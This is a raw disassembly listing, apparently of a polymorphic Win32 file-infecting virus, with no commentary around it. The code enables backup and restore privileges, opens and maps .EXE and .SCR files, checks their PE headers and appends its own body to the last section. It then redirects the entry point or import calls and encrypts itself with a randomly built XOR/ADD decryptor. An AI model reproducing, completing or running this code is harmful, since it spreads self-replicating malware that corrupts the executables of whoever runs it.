test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3143BDED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_3143B7DF
call sub_3143B76D
mov al, 0C3h
stosb
call sub_3143B76D
loc_3143BDED: ; CODE XREF: UPX2:3143BDCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_3143B76D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_3143BE20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_3143BE2A
; ---------------------------------------------------------------------------
loc_3143BE20: ; CODE XREF: UPX2:3143BE12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_3143BE2A: ; CODE XREF: UPX2:3143BE1E�j
stosw
call sub_3143B76D
loc_3143BE31: ; CODE XREF: UPX2:3143BDC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3143BE9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_3143BE66
lea eax, [ebp+1039B8h]
loc_3143BE5E: ; CODE XREF: UPX2:3143BE64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3143BE5E
loc_3143BE66: ; CODE XREF: UPX2:3143BE56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3143BE7B
mov ax, 0C031h
stosw
loc_3143BE7B: ; CODE XREF: UPX2:3143BE73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3143BE94
mov ax, 0C031h
stosw
loc_3143BE94: ; CODE XREF: UPX2:3143BE8C�j
mov al, 0C3h
stosb
call sub_3143B76D
loc_3143BE9C: ; CODE XREF: UPX2:3143BE3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3143BEB4
push edi
sub edi, eax
pop eax
jmp short loc_3143BECD
; ---------------------------------------------------------------------------
loc_3143BEB4: ; CODE XREF: UPX2:3143BEAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3143BECD: ; CODE XREF: UPX2:3143BEB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3143BEED
neg eax
loc_3143BEED: ; CODE XREF: UPX2:3143BEE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3143BEF1 proc near ; CODE XREF: sub_3143C45B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_3143C0D9
call near ptr loc_3143BF11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3143BF11: ; CODE XREF: sub_3143BEF1+F�p
add bh, bh
sub_3143BEF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3143B414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3143B414
mov edi, [ebp+1042F4h]
push esi
call sub_3143B414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3143C0D9
jz loc_3143C0D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_3143C0AA
loc_3143BF8B: ; CODE XREF: sub_3143C0AA+29�j
lodsb
cmp al, 0E8h
jnz loc_3143C036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_3143B414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_3143BFB9
cmp eax, [edi+0Ch]
jnb loc_3143C0D2
jmp short loc_3143BFC5
; ---------------------------------------------------------------------------
loc_3143BFB9: ; CODE XREF: sub_3143C0AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_3143C0D2
loc_3143BFC5: ; CODE XREF: sub_3143C0AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_3143C0D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3143B414
cmp [ebp+1042F4h], edi
jnz loc_3143C0D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3143C0D2
cmp eax, [edi+8]
jnb loc_3143C0D2
loc_3143C00E: ; CODE XREF: sub_3143C0AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_3143C0E8
jmp loc_3143C0D2
; ---------------------------------------------------------------------------
loc_3143C036: ; CODE XREF: sub_3143C0AA-11C�j
cmp al, 0FFh
jnz loc_3143C0D2
cmp byte ptr [esi], 15h
jnz loc_3143C0D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3143B414
cmp [ebp+1042F4h], edi
jnz short loc_3143C0D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3143C07F
cmp eax, [ebp+10431Ch]
jb short loc_3143C0E8
loc_3143C07F: ; CODE XREF: sub_3143C0AA-35�j
cmp eax, 70000000h
jb short loc_3143C0BD
call sub_3143C0AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_3143C0A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3143C0C4
; ---------------------------------------------------------------------------
locret_3143C0A9: ; CODE XREF: sub_3143C0AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3143C0AA
; =============== S U B R O U T I N E =======================================
sub_3143C0AA proc near ; CODE XREF: sub_3143C0AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3143BF8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_3143B51B
popa
loc_3143C0BD: ; CODE XREF: sub_3143C0AA-26�j
test eax, 80000000h
jnz short loc_3143C0D2
loc_3143C0C4: ; CODE XREF: sub_3143C0AA-3�j
sub eax, [edi+0Ch]
jb short loc_3143C0D2
cmp eax, [edi+8]
jb loc_3143C00E
loc_3143C0D2: ; CODE XREF: sub_3143C0AA-F9�j
; sub_3143C0AA-EB�j ...
dec ecx
jnz loc_3143BF8B
loc_3143C0D9: ; CODE XREF: sub_3143BEF1+9�j
; UPX2:3143BF73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3143C12A
; ---------------------------------------------------------------------------
loc_3143C0E8: ; CODE XREF: sub_3143C0AA-7F�j
; sub_3143C0AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3143C12A: ; CODE XREF: sub_3143C0AA+3C�j
pop edi
pop esi
retn
sub_3143C0AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3143C12D proc near ; CODE XREF: UPX2:3143C42E�p
; FUNCTION CHUNK AT 3143C257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_3143C257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_3143C257
call sub_3143A5AF
call near ptr loc_3143C168+5
push ebx
db 65h
jz short near ptr unk_3143C1A6
imul ebp, [ebp+53h], 72756365h
loc_3143C168: ; CODE XREF: sub_3143C12D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_3143C12D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3143C19C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_3143C203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3143C19C: ; CODE XREF: UPX2:3143C17F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_3143C1A6 db 0 ; CODE XREF: sub_3143C12D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_3143C203: ; CODE XREF: UPX2:3143C18D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_3143C12D
loc_3143C257: ; CODE XREF: sub_3143C12D+A�j
; sub_3143C12D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3143C12D
; =============== S U B R O U T I N E =======================================
sub_3143C259 proc near ; CODE XREF: UPX2:3143C427�p
; UPX2:3143C433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_3143C32A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_3143C32A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_3143C8AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3143C89F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3143C89F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3143C89F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_3143C877
mov [ebp+1042B4h], eax
locret_3143C32A: ; CODE XREF: sub_3143C259+10�j
; sub_3143C259+27�j ...
retn
sub_3143C259 endp
; ---------------------------------------------------------------------------
loc_3143C32B: ; CODE XREF: sub_3143C45B+188�p
; sub_3143C45B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_3143C370 proc near ; CODE XREF: sub_3143C45B:loc_3143C4D0�p
; sub_3143C45B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_3143C375: ; CODE XREF: sub_3143C370+23�j
jecxz short locret_3143C3AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3143C3AC
cmp dword ptr [edx+0Ch], 1
jb short loc_3143C375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_3143C3AC: ; CODE XREF: sub_3143C370:loc_3143C375�j
; sub_3143C370+1D�j ...
retn
sub_3143C370 endp
; =============== S U B R O U T I N E =======================================
sub_3143C3AD proc near ; CODE XREF: UPX2:3143C445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3143C3AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3143C3BA: ; CODE XREF: UPX2:3143C3DB�j
mov ecx, edi
jmp short loc_3143C3C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_3143C3C5: ; CODE XREF: UPX2:3143C3D7�j
mov ebx, edi
xor ecx, ecx
loc_3143C3C9: ; CODE XREF: UPX2:3143C3BC�j
; UPX2:3143C3DF�j
lodsb
cmp al, 61h
jb short loc_3143C3D4
cmp al, 7Ah
ja short loc_3143C3D4
sub al, 20h
loc_3143C3D4: ; CODE XREF: UPX2:3143C3CC�j
; UPX2:3143C3D0�j
stosb
cmp al, 5Ch
jz short loc_3143C3C5
cmp al, 2Eh
jz short loc_3143C3BA
cmp al, 0
jnz short loc_3143C3C9
jecxz short locret_3143C3AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3143C3F7
cmp eax, 524353h
jnz locret_3143C32A
loc_3143C3F7: ; CODE XREF: UPX2:3143C3EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3143C32A
cmp eax, 4E554357h
jz locret_3143C32A
cmp eax, 32334357h
jz locret_3143C32A
cmp eax, 4F545350h
jz locret_3143C32A
xor ebx, ebx
call sub_3143C259
jnz short loc_3143C43E
call sub_3143C12D
call sub_3143C259
jz locret_3143C32A
loc_3143C43E: ; CODE XREF: UPX2:3143C42C�j
xor edx, edx
call sub_3143C45B
call sub_3143C3AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_3143C855
; =============== S U B R O U T I N E =======================================
sub_3143C45B proc near ; CODE XREF: UPX2:3143C440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3143C855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3143C855
test dword ptr [ebx+16h], 2000h
jnz loc_3143C855
test byte ptr [ebx+5Ch], 2
jz loc_3143C855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_3143C855
cmp eax, 20202020h
jz loc_3143C855
mov ecx, [ebx+0C8h]
jecxz short loc_3143C4D0
push ecx
call sub_3143B414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_3143C4D0: ; CODE XREF: sub_3143C45B+5D�j
call sub_3143C370
jb loc_3143C855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_3143C4F0
xor eax, eax
jmp short loc_3143C4F5
; ---------------------------------------------------------------------------
loc_3143C4F0: ; CODE XREF: sub_3143C45B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_3143C4F5: ; CODE XREF: sub_3143C45B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_3143AB50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_3143C517: ; CODE XREF: sub_3143C45B+D5�j
push 20h
dec cl
pop eax
js short loc_3143C532
call near ptr dword_3143AB50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_3143C517
; ---------------------------------------------------------------------------
loc_3143C532: ; CODE XREF: sub_3143C45B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_3143C560
test dword ptr [ebp+1039C0h], 3
jnz short loc_3143C556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_3143C560
; ---------------------------------------------------------------------------
loc_3143C556: ; CODE XREF: sub_3143C45B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_3143C560: ; CODE XREF: sub_3143C45B+E1�j
; sub_3143C45B+F9�j ...
push 6
pop ecx
loc_3143C566: ; CODE XREF: sub_3143C45B+129�j
push 6
pop eax
call near ptr dword_3143AB50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_3143C566
test dword ptr [ebp+1039C0h], 8
jnz short loc_3143C59B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_3143C560
loc_3143C59B: ; CODE XREF: sub_3143C45B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3143C5C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_3143C560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_3143C560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_3143C560
loc_3143C5C2: ; CODE XREF: sub_3143C45B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3143C5D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_3143C560
loc_3143C5D7: ; CODE XREF: sub_3143C45B+171�j
and dword ptr [ebp+104300h], 0
call loc_3143B855
call loc_3143C32B
call sub_3143C85E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_3143C259
jz loc_3143C855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3143C370
jb loc_3143C855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3143C64B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3143C64B: ; CODE XREF: sub_3143C45B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3143C65F
rep movsb
loc_3143C65F: ; CODE XREF: sub_3143C45B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_3143C71D
push dword ptr [ebx+28h]
call sub_3143B414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_3143C71D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3143C69C
xor ecx, ecx
loc_3143C69C: ; CODE XREF: sub_3143C45B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_3143C703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3143C6DC
neg dword ptr [eax]
loc_3143C6DC: ; CODE XREF: sub_3143C45B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_3143C6FA
neg dword ptr [eax]
loc_3143C6FA: ; CODE XREF: sub_3143C45B+29B�j
push ecx
call loc_3143C32B
pop ecx
jmp short loc_3143C70F
; ---------------------------------------------------------------------------
loc_3143C703: ; CODE XREF: sub_3143C45B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3143C70F: ; CODE XREF: sub_3143C45B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_3143C71D: ; CODE XREF: sub_3143C45B+20E�j
; sub_3143C45B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_3143C736
imul edx, 12345678h
loc_3143C736: ; CODE XREF: sub_3143C45B+2D3�j
mov [eax-19h], dx
call sub_3143A120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_3143C768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_3143C768: ; CODE XREF: sub_3143C45B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_3143C784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_3143C784: ; CODE XREF: sub_3143C45B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3143C797
push edx
call sub_3143BEF1
pop edx
loc_3143C797: ; CODE XREF: sub_3143C45B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_3143C7A4
mov [ebx+28h], ecx
jmp short loc_3143C7B1
; ---------------------------------------------------------------------------
loc_3143C7A4: ; CODE XREF: sub_3143C45B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_3143C7AE
jmp short loc_3143C7B1
; ---------------------------------------------------------------------------
loc_3143C7AE: ; CODE XREF: sub_3143C45B+34F�j
mov ecx, [ebx+28h]
loc_3143C7B1: ; CODE XREF: sub_3143C45B+347�j
; sub_3143C45B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_3143C7D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_3143C7D1: ; CODE XREF: sub_3143C45B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_3143C7E2
mov [edx+8], ecx
loc_3143C7E2: ; CODE XREF: sub_3143C45B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_3143C813
add ecx, [ebp+101069h]
loc_3143C813: ; CODE XREF: sub_3143C45B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3143C835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3143C835
mov dh, [ebp+1039BFh]
loc_3143C835: ; CODE XREF: sub_3143C45B+3C4�j
; sub_3143C45B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_3143C84C
loc_3143C841: ; CODE XREF: sub_3143C45B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3143C841
jmp short loc_3143C855
; ---------------------------------------------------------------------------
loc_3143C84C: ; CODE XREF: sub_3143C45B+3E4�j
; sub_3143C45B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3143C84C
loc_3143C855: ; CODE XREF: UPX2:3143C456�j
; sub_3143C45B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3143C45B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3143C85E proc near ; CODE XREF: sub_3143C45B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_3143C32A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_3143C877: ; CODE XREF: sub_3143C259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3143C89F: ; CODE XREF: sub_3143C259+6B�j
; sub_3143C259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_3143C8AB: ; CODE XREF: sub_3143C259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_3143C85E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 0DB81234h
dd 6003694Dh, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 36946DFh
dd 8FB8B1EBh, 0E803694Ch, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 3060702h, 1A970105h
dd 301E78A4h, 119415FFh, 0FF8B0100h, 0C3906893h, 0C48BED01h
dd 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h, 64FAEB00h, 18A167h
dd 0F30408Bh, 830240B6h, 427500F8h, 0E8h, 0ED815D00h, 402338h
dd 2385858Bh, 85030040h, 40238Dh, 858BF08Bh, 402389h, 238D8503h
dd 60500040h, 0C933FE8Bh, 2395958Ah, 32AC0040h, 0AAD002C2h
dd 918D3B41h, 7C004023h, 2BC361F1h, 30FF64C0h, 0B8208964h
dd 107h dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 0F5h dup(0)
dd 7C900000h, 133Dh dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_3144204D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_31442041
mov ebx, [eax+29C1h]
jmp short loc_3144204B
; ---------------------------------------------------------------------------
loc_31442041: ; CODE XREF: UPX2:31442037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_3144204B: ; CODE XREF: UPX2:3144203F�j
mov ebx, [ebx]
loc_3144204D: ; CODE XREF: UPX2:3144201F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 9E05h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 77h
rep movsb
